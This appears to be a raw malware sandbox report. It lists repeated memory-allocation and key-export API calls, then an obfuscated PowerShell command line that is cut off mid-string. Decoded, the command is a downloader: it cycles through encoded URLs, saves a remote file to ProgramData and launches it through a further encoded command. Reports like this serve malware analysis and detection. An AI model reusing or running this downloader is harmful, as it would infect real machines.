blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00487c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00487c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00487c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00487c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00487c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00487c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x742d2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 917504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02930000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 236
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73971000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 236
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73972000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02632000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02642000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02643000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02644000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02677000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02645000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02646000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02663000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02664000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02665000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02666000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02667000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02668000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02669000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ada000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02adb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02adc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02add000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ade000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02adf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c31000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c32000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c33000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAGwAbQBzAGcAaQB2AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABZAEEATABnAEEAeQBBAEQAVQBBAE4AQQBBAHUAQQBEAGsAQQBPAEEAQQA9AEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAVQBBAGIAZwBCADAAQQBHAFUAQQBiAFEAQgB3AEEASABRAEEAYQBRAEIAaQBBAEcAdwBBAGUAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCADAAQQBHAEUAQQBjAGcAQgA1AEEAQwA0AEEAYgBnAEIAcwBBAEEAPQA9AEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbABBAEcAdwBBAGEAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEARwA0AEEAZABBAEEAdQBBAEcAawBBAGQAQQBBAD0AIgA7ACQAcAByAGUAZABpAHMAYwBvAHYAZQByAHkAVQBuAG0AYQByAHIAaQBhAGcAZQBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEANQBBAEQAVQBBACIAOwAkAGkAbgB0AG8AeABpAGMAYQB0AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBjAGcAQgBoAEEARwA0AEEAYgBnAEIAcABBAEcAVQBBAGMAdwBCAFEAQQBHAEUAQQBjAGcAQgBoAEEASABBAEEAYQBBAEIAeQBBAEcARQBBAGMAdwBCAHAAQQBIAE0AQQBkAEEAQQB1AEEASABBAEEAYgBBAEIAMQBBAEgATQBBAHYASABBAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAFkAQQBNAEEAQQB1AEEARABRAEEATQBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBBAD0APQB2AEgAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBIAFUAQQBZAGcAQgAwAEEARwBrAEEAZABBAEIAcwBBAEcAawBBAGIAZwBCAG4AQQBFAFUAQQBlAEEAQgAwAEEASABVAEEAYwB3AEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAE0AQQBZAFEAQgB3AEEARwBVAEEAZABBAEIAdgBBAEgAYwBBAGIAZwBBAD0AdgBIAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEARwA0AEEAYQBnAEIAdgBBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgA1AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9ACIAOwAkAGUAZABlAG8AbABvAGcAeQBDAG8AbgBuAG8AdABhAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATwBRAEEAMwBBAEMANABBAE4AQQBBAHoAQQBDADgAQQBjAFEAQgBrAEEARgBBAEEATAB3AEIAMwBBAEUAWQBBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEQAYwBBAFoAZwBCAGkAQQBFAE0AQQBlAFEAQgBoAEEASABRAEEAVABBAEIANQBBAEEAPQA9AEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATwBRAEEAeQBBAEMAOABBAFMAZwBCAFUAQQBHAGsAQQBMAHcAQgAwAEEARgBvAEEAYgBnAEIAcABBAEUAVQBBAFIAZwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA0AEEAQwA4AEEATwBRAEIARABBAEcAMABBAE8AUQBCAEYAQQBGAGMAQQBMAHcAQgBKAEEARQBNAEEAVgB3AEEAdwBBAEcAYwBBAE8AUQBCAFMAQQBFAHMAQQBRAFEAQgBMAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAYwBsAGEAeQBvAHEAdQBvAHQAWABpAHAAaABvAHMAdQByAGUAIABpAG4AIAAkAGUAZABlAG8AbABvAGcAeQBDAG8AbgBuAG8AdABhAHQAZQAgAC0AcwBwAGwAaQB0ACAAIgBKACIAKQAgAHsAJABDAGgAYQByAGkAbAB5AEMAbwByAG4AaQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQBRAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABJAEEATABnAEEAeABBAEQAWQBBAE4AUQBBAD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAZwBBAEwAZwBBAHgAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMABBAEEAPQA9ACIAOwAkAEIAbwBuAHoAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBBAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAyAEEARABRAEEATABnAEEAeABBAEQASQBBAE0AZwBBAD0AdgBmAFcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABjAEEATABnAEEANABBAEQAQQBBAEwAZwBBADAAQQBEAFUAQQBMAGcAQQB4AEEARABrAEEATgBBAEEAPQB2AGYAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBiAGcAQgB1AEEARwBVAEEAWQB3AEIAMABBAEcARQBBAGIAZwBCADAAQQBFAGsAQQBaAEEAQgBwAEEARwA4AEEAWQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHADgAQQBjAHcAQgB2AEEARwAwAEEAWgBRAEEAdQBBAEcAVQBBAGMAdwBCADAAQQBHAEUAQQBkAEEAQgBsAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFUAbgBzAGkAbgBnAGwAZQBuAGUAcwBzAEIAbwBuAHMAcABpAGUAbABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABFAEEATABnAEEAeQBBAEQAUQBBAE4AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMABBAEEAPQA9AFoAcQBDAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBOAEEARwBVAEEAYwB3AEIAaABBAEcAdwBBAGIAQQBCAHAAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAdwBBAEcAawBBAFkAdwBCAHoAQQBBAD0APQAiADsAJAB1AG4AZABlAHIAdABlAGEAbQBlAGQAQwBpAHQAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEkAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEAYgB3AEIANABBAEcAVQBBAGIAZwBCAHYAQQBIAFUAQQBjAHcAQQB1AEEARwBZAEEAWQBRAEIAcABBAEcAdwBBAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABFAEEATgB3AEEAdQBBAEQASQBBAE0AZwBBAHgAQQBDADQAQQBPAEEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAVQBBAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEAMQBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQA1AEEARABJAEEATABnAEEAeABBAEQARQBBAE8AUQBBAD0AIgA7ACQAVQBuAGMAbwBuAHQAZQBtAHAAbABhAHQAaQB2AGUAbgBlAHMAcwBEAGUAYwBhAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABjAGwAYQB5AG8AcQB1AG8AdABYAGkAcABoAG8AcwB1AHIAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFUAbgBjAG8AbgB0AGUAbQBwAGwAYQB0AGkAdgBlAG4AZQBzAHMARABlAGMAYQBkAGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABhAG0AaQBuAGEAdABpAG8AbgAuAHUAbgBuAGEAaQB2AGUAbAB5ADsAJABQAG8AbAB5AHIAaAB5AHQAaABtAGkAYwBhAGwAbAB5AFMAdQBwAGUAcgBjAGEAcAB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBVAEEASABJAEEAWQBRAEIAdABBAEcAVQBBAGIAQQBCAHMAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQBPAHQAUwBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQwBBAEcAOABBAGIAZwBCAGwAQQBHAEUAQQBZAHcAQgBvAEEARwBVAEEATABnAEIAegBBAEgAUQBBAE8AdABTAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATQB3AEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AdwBBAD0ATwB0AFMAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAMQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQAzAEEARABZAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABhAG0AaQBuAGEAdABpAG8AbgAuAHUAbgBuAGEAaQB2AGUAbAB5ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA1ADMAOQA5ADMAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAHcAQQBZAFEAQgB0AEEARwBrAEEAYgBnAEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBMAGcAQgAxAEEARwA0AEEAYgBnAEIAaABBAEcAawBBAGQAZwBCAGwAQQBHAHcAQQBlAFEAQQBzAEEASABZAEEAYQBRAEIAdwBBAEgATQBBAE8AdwBCAE4AQQBFAGsAQQBWAEEAQgBNAEEARwBrAEEAWQB3AEIAbABBAEcANABBAGMAdwBCAGwAQQBBAD0APQAiADsAJABFAG4AcwBpAGUAbgB0ACAAPQAgACIAYQBBAEIAMABB